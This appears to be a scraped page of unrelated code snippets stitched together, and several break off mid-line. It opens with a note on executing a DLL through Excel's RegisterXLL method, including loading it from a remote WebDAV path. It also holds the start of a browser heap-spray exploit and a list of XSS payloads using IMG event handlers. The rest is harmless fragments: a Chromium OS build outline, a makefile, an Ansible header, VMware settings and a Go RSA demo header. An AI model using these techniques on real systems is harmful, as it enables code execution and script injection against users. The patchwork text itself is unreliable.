berney

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

Chromium OS ft. Docker

Chromium OS is cool. Chromium OS with crouton is cooler. Chromium OS with Docker is even cooler. This is specifically a guide for the Chromebook Pixel 2 (2015), but I can't think of any reason it wouldn't work with other devices.

Create a build environment
Customize the kernel
Build Chromium OS
Flash Chromium OS to USB
Install Chromium OS

	<script>
	var PAGE_SIZE = 16384;
	var SIZEOF_CSS_FONT_FACE = 0xb8;
	var HASHMAP_BUCKET = 208;
	var STRING_OFFSET = 20;
	var SPRAY_FONTS = 0x1000;
	var GUESS_FONT = 0x200430000;
	var NPAGES = 20;
	var INVALID_POINTER = 0;
	var HAMMER_FONT_NAME = "font8"; //must take bucket 3 of 8 (counting from zero)

	%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
	<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">


	#define macros
	EXE = executable.exe
	SRC = src
	BIN = bin
	INT = obj
	INCL = include

	OCV_INC = "$(OPENCV_DIR)\..\..\include"
	OCV_LIB = "$(OPENCV_DIR)\lib\opencv_world310.lib"

	"""Ansible dict filters."""

	# Make coding more python3-ish
	from __future__ import (absolute_import, division, print_function)
	__metaclass__ = type


	from ansible.errors import AnsibleError

	# This program is free software: you can redistribute it and/or modify
	# it under the terms of the GNU General Public License as published by
	# the Free Software Foundation, either version 3 of the License, or
	# (at your option) any later version.
	#
	# This program is distributed in the hope that it will be useful,
	# but WITHOUT ANY WARRANTY; without even the implied warranty of
	# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
	# GNU General Public License for more details.
	#

	mainmem.backing = "swap" # disable swapping
	MemTrimRate = "0" # disable returning unused memory to the host
	sched.mem.pshare.enable = "FALSE" # disable page sharing
	prefvmx.useRecommendedLockedMemSize = "TRUE" # force memory to be pre-allocated on host
	scsi0.virtualDev = "pvscsi" # fasted disk i/o subsystem (requires driver off pvscsi.flp floppy disk image)
	scsi0:0.virtualSSD = 1 # if running off an SSD

	## also, preallocate the VMDK disks

	/*
	* Demonstrates that an RSA signature does not uniquely identify a public key.
	* Given a signature, s, and a message m, it's possible to construct a new RSA key
	* pair such that s is a valid signature for m under the new key pair.
	*
	* Requires Go version >= 1.5. Go <= 1.4 doesn't work due to a bug in the bignum
	* package: https://github.com/golang/go/issues/9826
	*
	* Written in 2015 by Andrew Ayer <agwa@andrewayer.name>
	*